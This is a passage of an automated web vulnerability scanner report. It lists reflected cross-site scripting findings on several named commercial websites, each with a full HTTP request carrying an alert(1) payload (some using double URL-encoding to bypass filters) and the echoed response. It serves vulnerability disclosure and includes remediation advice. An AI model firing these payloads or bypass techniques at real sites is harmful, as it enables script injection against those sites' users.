Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:04:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855783453842a019bd876d56b32; path=/
Vary: User-Agent
Content-Length: 31652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//EN" xml:lang="e
...[SNIP]...
   var item_no = ((pg - 1) * 20) + 1;
       performSearch('position', item_no, 'r', '1', pg);

   });
   $("form#pagination").submit( function(event) {
       return false;
   });
});
   var _urlSearch = "/f245f"-alert(1)-"205a1a30ed4";
   var _historyParam = "otzu6o3x||find-box~xss chair desk shoes";
   var _gaParamA = { 'gv' : '20', 'pg' : '1'};
   function getHistory() { return _historyParam; }
   function getHMGa() { //HtzMrc
...[SNIP]...

3.407. http://www.hertzfurniture.com/search.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /search.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a52f"><script>alert(1)</script>8bad230412e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.php2a52f"><script>alert(1)</script>8bad230412e?find-box=xss%20chair%20desk%20shoes HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:04:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/
Vary: User-Agent
Content-Length: 11980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<link rel="canonical" href="http://www.hertzfurniture.com/search.php2a52f"><script>alert(1)</script>8bad230412e" />
...[SNIP]...

3.408. http://www.hertzfurniture.com/search.php [find-box parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /search.php

Issue detail

The value of the find-box request parameter is copied into the HTML document as plain text between tags. The payload 147e8%253cscript%253ealert%25281%2529%253c%252fscript%253e1ac49b1c1fa was submitted in the find-box parameter. This input was echoed as 147e8<script>alert(1)</script>1ac49b1c1fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the find-box request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search.php?find-box=xss%20chair%20desk%20shoes147e8%253cscript%253ealert%25281%2529%253c%252fscript%253e1ac49b1c1fa HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:01:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384a7e4525ac017ba0d; path=/
Vary: User-Agent
Content-Length: 31991


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//EN" xml:lang="e
...[SNIP]...
</a>
&gt; Search Results: xss chair desk shoes147e8<script>alert(1)</script>1ac49b1c1fa</div>
...[SNIP]...

3.409. http://www.hertzfurniture.com/search.php [find-box parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /search.php

Issue detail

The value of the find-box request parameter is copied into an HTML comment. The payload 66c9b--><img%20src%3da%20onerror%3dalert(1)>e54daa9ca31 was submitted in the find-box parameter. This input was echoed as 66c9b--><img src=a onerror=alert(1)>e54daa9ca31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /search.php?find-box=xss%20chair%20desk%20shoes66c9b--><img%20src%3da%20onerror%3dalert(1)>e54daa9ca31 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:32:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384a7e4525ac017ba0d; path=/
Vary: User-Agent
Content-Length: 31945


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//EN" xml:lang="e
...[SNIP]...
</b> TASK search { mode page='SEARCH+NAV'; free_text = "xss chair desk shoes66c9b--><img src=a onerror=alert(1)>e54daa9ca31"; cfg answers_per_page = '20'; }<br />
...[SNIP]...

3.410. http://www.hertzfurniture.com/search.php [find-box parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /search.php

Issue detail

The value of the find-box request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd60a</script><img%20src%3da%20onerror%3dalert(1)>c6b76cc6d5c was submitted in the find-box parameter. This input was echoed as bd60a</script><img src=a onerror=alert(1)>c6b76cc6d5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search.php?find-box=xss%20chair%20desk%20shoesbd60a</script><img%20src%3da%20onerror%3dalert(1)>c6b76cc6d5c HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:31:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384a7e4525ac017ba0d; path=/
Vary: User-Agent
Content-Length: 31995


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//EN" xml:lang="e
...[SNIP]...
r', '1', pg);

   });
   $("form#pagination").submit( function(event) {
       return false;
   });
});
   var _urlSearch = "/search.php";
   var _historyParam = "5a426zjk||find-box~xss chair desk shoesbd60a</script><img src=a onerror=alert(1)>c6b76cc6d5c";
   var _gaParamA = { 'gv' : '20', 'pg' : '1'};
   function getHistory() { return _historyParam; }
   function getHMGa() { //HtzMrc GA
       var ga_param = '';
       //need 'pg' first
       if (_gaParamA['p
...[SNIP]...

3.411. http://www.hertzfurniture.com/search.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6e615%253cscript%253ealert%25281%2529%253c%252fscript%253e2729834ec88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e615<script>alert(1)</script>2729834ec88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search.php?find-box=xss%20chair%20desk%20s/6e615%253cscript%253ealert%25281%2529%253c%252fscript%253e2729834ec88hoes HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:03:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384f20b9ffb48ea05c5; path=/
Vary: User-Agent
Content-Length: 32002


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//EN" xml:lang="e
...[SNIP]...
</a>
&gt; Search Results: xss chair desk s/6e615<script>alert(1)</script>2729834ec88hoes</div>
...[SNIP]...

3.412. http://www.hertzfurniture.com/search.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9483f</script><img%20src%3da%20onerror%3dalert(1)>812974d48dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9483f</script><img src=a onerror=alert(1)>812974d48dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search.php?find-box=xss%20chair%20desk%20s/9483f</script><img%20src%3da%20onerror%3dalert(1)>812974d48dchoes HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:34:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384f20b9ffb48ea05c5; path=/
Vary: User-Agent
Content-Length: 32006


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//EN" xml:lang="e
...[SNIP]...
, 'r', '1', pg);

   });
   $("form#pagination").submit( function(event) {
       return false;
   });
});
   var _urlSearch = "/search.php";
   var _historyParam = "n6loegij||find-box~xss chair desk s/9483f</script><img src=a onerror=alert(1)>812974d48dchoes";
   var _gaParamA = { 'gv' : '20', 'pg' : '1'};
   function getHistory() { return _historyParam; }
   function getHMGa() { //HtzMrc GA
       var ga_param = '';
       //need 'pg' first
       if (_gaParam
...[SNIP]...

3.413. http://www.hertzfurniture.com/search.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ebe6f--><img%20src%3da%20onerror%3dalert(1)>1f2c956f488 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ebe6f--><img src=a onerror=alert(1)>1f2c956f488 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /search.php?find-box=xss%20chair%20desk%20s/ebe6f--><img%20src%3da%20onerror%3dalert(1)>1f2c956f488hoes HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:03:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384c75445a36c37a16a; path=/
Vary: User-Agent
Content-Length: 31956


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//EN" xml:lang="e
...[SNIP]...
</b> TASK search { mode page='SEARCH+NAV'; free_text = "xss chair desk s/ebe6f--><img src=a onerror=alert(1)>1f2c956f488hoes"; cfg answers_per_page = '20'; }<br />
...[SNIP]...

3.414. http://www.infinity-micro.com/ProdDisplay1.asp [CatID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infinity-micro.com
Path:   /ProdDisplay1.asp

Issue detail

The value of the CatID request parameter is copied into an HTML comment. The payload e0e39--><script>alert(1)</script>628b8cd7651 was submitted in the CatID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /ProdDisplay1.asp HTTP/1.1
Host: www.infinity-micro.com
Proxy-Connection: keep-alive
Content-Length: 49
Cache-Control: max-age=0
Origin: http://www.infinity-micro.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.infinity-micro.com/prodDisplay_inter-CatID-163-ProdID-40445.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQSDTASB=LPLPOGICGMHGGPDBAOCFKLCB

CatID=163e0e39--><script>alert(1)</script>628b8cd7651&ProdID=40445&ifmap=&ExportID=&k=&se=&p=

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Sep 2011 12:26:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 55429
Content-Type: text/html
Cache-control: private


<form name="frmPreLogin" method="Post" action="Cart.asp">
   <input type="hidden" name="CatID" value="163e0e39--><script>alert(1)</script>628b8cd7651">
   <input type="hidden" name="ProdID" value="404
...[SNIP]...
=\'Bookmark this page\'" '
                    +' onMouseOut="self.status=\'\'" '
                    +' href="javascript:window.external.AddFavorite'
                    +'(\'http://www.infinity-micro.com/prodDisplay_Inter.asp?CatID=163e0e39--><script>alert(1)</script>628b8cd7651&ProdID=40445\','
                    +'\'Infinity-Micro.com\')" class="left">
...[SNIP]...

3.415. http://www.infinity-micro.com/ProdDisplay1.asp [CatID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infinity-micro.com
Path:   /ProdDisplay1.asp

Issue detail

The value of the CatID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9e71'%3balert(1)//10395de5436 was submitted in the CatID parameter. This input was echoed as b9e71';alert(1)//10395de5436 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /ProdDisplay1.asp HTTP/1.1
Host: www.infinity-micro.com
Proxy-Connection: keep-alive
Content-Length: 49
Cache-Control: max-age=0
Origin: http://www.infinity-micro.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.infinity-micro.com/prodDisplay_inter-CatID-163-ProdID-40445.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQSDTASB=LPLPOGICGMHGGPDBAOCFKLCB

CatID=163b9e71'%3balert(1)//10395de5436&ProdID=40445&ifmap=&ExportID=&k=&se=&p=

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Sep 2011 12:26:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 55349
Content-Type: text/html
Cache-control: private


<form name="frmPreLogin" method="Post" action="Cart.asp">
   <input type="hidden" name="CatID" value="163b9e71';alert(1)//10395de5436">
   <input type="hidden" name="ProdID" value="40445">
</form>

...[SNIP]...
=\'Bookmark this page\'" '
                    +' onMouseOut="self.status=\'\'" '
                    +' href="javascript:window.external.AddFavorite'
                    +'(\'http://www.infinity-micro.com/prodDisplay_Inter.asp?CatID=163b9e71';alert(1)//10395de5436&ProdID=40445\','
                    +'\'Infinity-Micro.com\')" class="left">
...[SNIP]...

3.416. http://www.infinity-micro.com/ProdDisplay1.asp [CatID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infinity-micro.com
Path:   /ProdDisplay1.asp

Issue detail

The value of the CatID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f3b9"><script>alert(1)</script>00d7deeb61e was submitted in the CatID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /ProdDisplay1.asp HTTP/1.1
Host: www.infinity-micro.com
Proxy-Connection: keep-alive
Content-Length: 49
Cache-Control: max-age=0
Origin: http://www.infinity-micro.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.infinity-micro.com/prodDisplay_inter-CatID-163-ProdID-40445.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQSDTASB=LPLPOGICGMHGGPDBAOCFKLCB

CatID=1634f3b9"><script>alert(1)</script>00d7deeb61e&ProdID=40445&ifmap=&ExportID=&k=&se=&p=

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Sep 2011 12:26:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 55424
Content-Type: text/html
Cache-control: private


<form name="frmPreLogin" method="Post" action="Cart.asp">
   <input type="hidden" name="CatID" value="1634f3b9"><script>alert(1)</script>00d7deeb61e">
   <input type="hidden" name="ProdID" value="4044
...[SNIP]...

3.417. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the d request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 625df"%3balert(1)//6bec7c98aa2 was submitted in the d parameter. This input was echoed as 625df";alert(1)//6bec7c98aa2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=6674&iv=1&iwidth=153&iheight=52&zzwindow=0&d=0625df"%3balert(1)//6bec7c98aa2&custom1=&custom2=&custom3= HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://posnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Fri, 30 Sep 2011 12:25:14 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 27360


var lhnTrack='';
var blhnInstalled=0;
if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnli
...[SNIP]...
